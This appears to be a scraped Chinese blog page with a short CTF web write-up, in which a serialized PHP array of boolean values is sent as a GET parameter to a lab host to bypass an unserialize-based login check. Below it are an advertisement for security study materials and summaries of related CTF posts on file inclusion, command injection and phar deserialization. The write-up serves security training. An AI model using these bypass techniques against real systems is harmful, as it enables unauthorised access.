ctf web who is flag

最新推荐文章于 2024-12-18 21:56:03 发布
最新推荐文章于 2024-12-18 21:56:03 发布
阅读量434 收藏 8
点赞数 5
分类专栏: 程序员 文章标签: 前端 服务器 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84969692/article/details/138961372
版权

发现data_unserialize = unserialize($info);这段代码使用了unserialize函数对输入的信息进行反序列化,那么我们先对像输入的内容进行序列化;

首先构建php文件:

具体内容如下所示:

<?php echo serialize(array( "username"=>true, "password"=>true, )); ?>

接下来再目录下输入cmd进入控制台,输入php test.php

输出序列化内容

a:2:{s:8:“username”;b:1;s:8:“password”;b:1;}

接下来访问172.17.0.34/?info=a:2:{s:8:“username”;b:1;s:8:“password”;b:1;}

(因为从代码中可以看出是对info进行GET)

找到了flag

flag为flag{who_is_flag_3001}

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

青少年CTF - Web - Flag在哪里 Wp WriteUp
zxsctf的博客
10-01 4770
在标签中的title标签下方,就有被注释的flagflag是动态的哦,同学们要自己好好做题!启动环境,需要等待大概20秒左右的时间。访问,页面显示Flag反正不在这。平台名称:青少年CTF训练平台。右键网页,发现无法使用右键。题目名称:Flag在哪里?
CTF基础知识”和“Web信息泄露”解题步骤
zwg147258369的博客
04-21 7567
CTF基础知识 一、CTF简介 1、打开题目 2、点击进入“题目附件”,寻找flag,在文章末尾 二、竞赛模式 1、打开题目 2、点击进入“题目附件”,寻找flag,在文档后部分 三、比赛形式 1、打开题目 2、点击进入“题目附件”,寻找flag,在文档结尾处 四、题目类型 1、打开题目 2、点击进入“题目附件”,寻找flag,在文档末尾 Web信息泄露 一、目录遍历 1、打开题目 2、点击开始寻找flag 3、这是点击进入后的界面 4、根据看到的目录,逐个打开,直到在上层目录中找到“
Bugku / CTF / WEB 输入密码查看flag
weixin_43851558的博客
07-28 3769
根据URL提示可知本题用爆破 本题要求的密码是5位数 修改google的代理服务器,再用burpsuite抓包,步骤如下: 1.将burpsuite打开后 点proxy >> intercept >>intercept is on >> 再浏览器页面输入密码 eg:1 并点击查看 2.抓包成功,页面如下: 如图可见最后一行显示我们输入...
CTF练习——WEB安全(BurpSuite为主)
zytjulie的博客
08-22 3535
CTF训练,WEB安全,Burpsuite部分
CTFWEB·通过CTFshow的例题来学习信息收集类题目的题型及对应做法
qq_54502707的博客
12-18 2229
大家好,这里是KOKO师傅~ WEB方向最简单的莫过于信息收集类型题目,我们以CTFshow的相关题目作为例题对这一类型的题目进行一个模块的针对练习!
CN-fnst::CTF Web
最新发布
pwfortune的博客
12-18 729
只能饿饿饿饿饿势力操作, 说明是登录的问题, 要用相应的账号登录才能查看, 而不是我们随便注册的一个账号(感觉这里有点抽象, 账号是。审计一下代码, 很明显看到class.php存在反序列化, 且存在文件上传的接口, 那么就可以想到是利用phar进行反序列化。后面就是前面那里的一下md5的绕过, 用数组就行, 还有一个就是需要爆破一下, 匹配它的md5的前5位是。有点奇怪就是, 好像没读到根目录文件, 读的网站目录的文件, 不过思路差不多就是这样了。参数 , 可以操作进行phar的反序列化, 存在waf。
“百度杯” CTF比赛 九月场 Web-who are you
qq_34106499的博客
01-16 528
1. 注重题目及源代码的提示; 2. 抓包并关注请求头和响应头中陌生内容; 3. base64编码的识别; 4. 凯撒加密方法; 5. ROT13加密及解密; 6. 上传文件过滤 ' < ' 的绕过方法
CTF萌新入坑指南(web篇)(21.6.5已更新)
kingdring的博客
09-27 6166
ps:其实在写这篇入坑指南的时候内心还是十分挣扎的,毕竟大佬太多而我自己太太太太菜,然鹅我也不好拒绝温柔善良的郑童鞋的邀请,因此这篇文章只面向最最最新的萌新,各位大佬请自行忽略 前言 webctf里面占到的比重还是蛮大的,从国内有ctf赛事以来,web就一直是各 路出题人的宠儿,就比如说前段时间的某次分区赛初赛题目构成是7pwn 7web 1re 1misc,虽然在我看来这个题目分配过于偏激且离谱了,但是足以看出webctf中的重要性,线下赛pwn佬可能更加关键,不过web手对于每个队伍都是
实验吧CTF-web
code_lab
02-27 6488
登陆一下好吗类型:sql注入已经过滤了/ # -- select or union |等,但是没有过滤单引号payload:username=pcat'='&password=pcat'='原sql语句为:select * from user where username='用户名' and password='密码'拼接后为:select * from user where username='p
CTFshow web入门——信息搜集
小元砸的博客
01-12 4411
web 1 题目:开发注释未及时删除 解题思路:ctrl+u查看源码即可得到flag web 2 题目:js前台拦截 === 无效操作 解题思路:打开可以看到 “无法查看源代码”的字样 但依然可以用ctrl+u的方法查看源码,即可得到flag web 3 题目:没思路的时候抓个包看看,可能会有意外收获 解题思路:F12查看一下响应头即可得到flag web 4 题目:总有人把后台地址写入robots,帮黑阔大佬们引路 解题思路:根据提示访问/robots.txt,会出现:"User-agent: * Di
web入门级理解
我在人间找bug
06-09 1011
笔者就web的基本知识进行了一定的总结,但是由于web的知识体系庞大,若要做到每个点面面俱到,恐怕以笔者现在的实力还很困难,故笔者以CTF为切入点,将web中最常用的基础知识进行一定的总结,因笔者能力有限,若有错误,恳请各位师傅指正。 CTF中的web是指? 先聊一聊CTFCTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办
新手上手ctf web简单小题教程 第二弹
2301_79817291的博客
10-27 501
总结:可以查看源代码,运用hackbar插件,在当添加需要的条件,还可以运用抓包,改变请求方式,利用域名修改网址。2.点击hackbar,再点击load url将该网址放进第一个框中,勾选post data。3.再第二个框里输入what=flag,最后点击execute,就可得到。2.运用x_forward_for 域名,加入需要网址。根据题目可知,需要参数what=flag.3.如需要特定浏览器,则添加referer。2.把admin=0改成admin=1。1.右击鼠标,检查源代码。
BugkuCTF-WEB-flag在index里
烟雨天青色
08-27 2730
这道题打开题目链接之后,页面只显示了一个名为“click me?no”的超链接,点开它。 点开之后可以发现页面变成的如图所示的样子,注意网页的url,根据url基本可以判断,这道题目属于文件包含类漏洞。 现在已知是文件包含漏洞的题目了,下一步我们就需要去读取被包含文件的内容,使用php://filter伪协议,具体如下: php://filter/read=convert.base...
几道webCTF——命令绕过
辰星的博客
03-14 1423
第一题无回显类型 这里的exec函数会把参数cmd的值当做命令执行,并且没有任何过滤和限制。 对于这种无回显的题目,我们可以选择重定向符>来查看和获取信息。 我们先使用cmd=ls>info然后查看info来获取当前路径下的文件信息,如下: 发现flag.php,我们再次使用重定向符把其内容写入一个文件,再读取这个文件即可,即使用cmd=cat fl*>info,再次前往页面查...
ctfshow web133和其他命令执行的骚操作
Firebasky的博客
10-15 5445
这里是总结自己最近遇到的命令执行题,感觉还是不错分享出来。也欢迎师傅们评论一些骚操作 1. ISITDTU QUALS 2020 REC <?php // error_reporting(E_ALL); // ini_set('display_errors', '1'); function trigonometric_check($code) { // Check length if (strlen($code) >= 0x100) {//256长度 retu.
CTFWebFlag题目(1)
热门推荐
TLXX1126的博客
07-13 3万+
今天做的一个题,题目上给了一个链接,链接是一个网页,网页上让输入一个pass key, 做题步骤是先用BP抓包,然后repeter看返回包 其中Content-Row是一个用base64加密过的一串字符,然后将其解码便得到了pass key 听火种CTF中胖虎大佬讲解是这么说的: 这个功能就是抓包和看返回包的过程 就跟你要看一个网站,你就得把你的IP地址各种请求告诉网站,
ctf web3 30 flag就在这里快来找找吧http://123.206.87.240:8002/web3
MIGENGKING的博客
06-13 7728
这节我们来破解一个HTML密码。 打开题目有提示“flag就在这里”的页面,总是打不开页面: 这时我们可以按“Fn+F12”(或者按“ctrl+U”)直接查看页面源码: 这是我们就需要把页面的HYML源代码在线解码一下(是解码!!): 但我们提交flag时提交(KEY{J2sa42ahJK-HS11III}) 这里我们应该了解一些关于ctf常见代码: 1.Base32加密: 例:KRUG...
CTF尝试去读取一下Web目录下的flag.php吧
diven2的博客
05-28 2782
CTF尝试去读取一下Web目录下的flag.php吧
CTF Web解题技巧:找flag夺旗赛常用思路
资源摘要信息:"CTF(Capture The Flag)是一个信息安全竞赛,在这个竞赛中,参与者需要通过各种信息安全技能来解决一系列的问题,并最终找到隐藏的flag(旗帜)。web解题是CTF竞赛中的一个重要的部分,主要考察选手...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值